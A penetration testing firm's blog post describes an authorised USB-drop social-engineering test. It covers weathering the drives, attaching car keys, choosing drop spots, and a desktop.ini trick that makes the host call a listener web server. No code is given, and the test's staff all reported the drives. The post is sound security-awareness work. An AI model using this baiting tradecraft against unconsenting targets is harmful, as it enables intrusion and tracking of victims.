CCL's Ben Strudwick draws on a recent real-life project to illustrate why getting creative can make for effective cyber security training.
Here at CCL our Penetration Testing Team perform a wide variety of tests to accommodate our clients’ needs. From web application penetration tests to network device configuration reviews, our testing team provide numerous testing capabilities so that a greater insight can be offered into a company’s security posture.
One security test which they were recently approached to undertake that particularly stood out was USB Drops testing.
Cyber security is a collective effort within a business. If one piece of the jigsaw is missing, a company’s security posture is weakened as a result. The client who commissioned the Testing Team to undertake this project wanted to test exactly this, specifically the fact that people are invariably the weakest link in modern-day cyber defences. Their objective was to ultimately challenge their staff’s security awareness by assessing if anybody within their workforce would fall short of vigilance when going about their day. Therefore, the USB Drops project was an interesting social experiment which would trial the ever-present risks of social engineering and human error.
USB Drops, or USB Dead Drops, are a form of USB-based attacks that cyber criminals could deploy on a target. It works by planting various innocently looking USB drives (or USB access points) within a physical location, in the hope that it entices nearby people to connect to them. Creativity is required to make a rather ordinary looking USB drive appear so tantalising that an unsuspecting victim must find out what is stored on it. Malicious code is contained on the device which can be used for attack methods such as spyware, keylogging, ransomware, social engineering, and backdoors. Once plugged in, the code would trigger on the victim machine and deliver its payload – causing the machine (any potentially more) to become compromised.
During a recent engagement, a phishing component was required in the form of carrying out USB drops. This required our Testing Team to plant numerous "malicious" USB drives around the locations in which they were engaged in.
Firstly, measures were taken by the team to ensure the USB drives appeared legitimate. The purpose of this was to make it appear as though it might relate to the client company, containing data which would be deemed ‘valuable’ to the target. After all, this attack relies solely upon a human decision to determine if the risk is worth taking (if any scepticism is exercised at all). Human error is therefore the vulnerability which they are attempting to exploit. The physical appearance of the USBs is an important factor for this. The team were mindful that they did not want any USB drives to look *too* new, as they wanted them to seem used to some extent… Kicking them around a car park for a few minutes achieves effective results!
Adding attachments can also be convincing, as it paints a stronger picture of the device’s backstory. The team attached keys to some USB devices such as a set of car keys. This makes USB drives look innocent, as though it belonged to somebody else who used it for everyday use. As it turns out, old keys are relatively easy to acquire via online marketplaces.
At this stage, the USB drive had been modified so that it now looked tempting enough to use. However, new questions now arose regarding their next move: Where should they be planted? And how should they be planted? The style in which they are deployed can make all the difference, as the scenario in which a victim finds themselves in can influence their decision-making process. The victim may find themselves asking questions such as "How did that get there?” and “Who could have left it here?" Naturally, they will likely point to the most likely cause. This is useful as these thought processes can be manipulated by the fine details. In the context of this engagement, it was useful for the team to think of areas someone may genuinely drop a USB drive:
• A car park between cars whilst someone is taking keys in or out of their pocket;
• Within a nearby smoking area;
• Reception areas / public corridors;
• Staff areas (more difficult);
There are some great devices which exist, such as makeshift keyboards which can execute commands when plugged into a device. These can be excellent methods for gaining access to target systems. However, they can be relatively expensive if you are planning on leaving them around a car park with the risk of never seeing them again.
For the technical aspect of this test, the team found a useful method of creating a ‘desktop.ini’ file on the drive. This would in essence be their attack method of choice. The user would proceed by opening the device on their machine which would then cause the file to point them to a listener which has been setup as a web server on the relevant network. Any requests made would enable the team to capture log files of users that have connected any distributed USB drives when they should not have. The hostname of the PC and the corresponding drive ID would also be visible so that they could cross-reference which drive was enacted by which host.
Despite our best efforts, the findings from this test showed that no users plugged-in any USB drives that were deployed throughout the site. The client’s staff exceeded all expectations, and instead, went out of their way to proactively report these suspicious USB drives to more senior members throughout the affected departments. News travelled fast, and within a very short period, surrounding personnel were made aware not to use them.
The client was very satisfied with both the efforts we went to to simulate a convincing attack, and the response shown by their respective employees. This engagement assured them that their users exercised caution by not using the USB drives which were purposely dispensed throughout their business – regardless of how tempting they appeared to be. This really helped to increase awareness in security and reiterated to their staff the vital role they have in safeguarding their organisation from attack.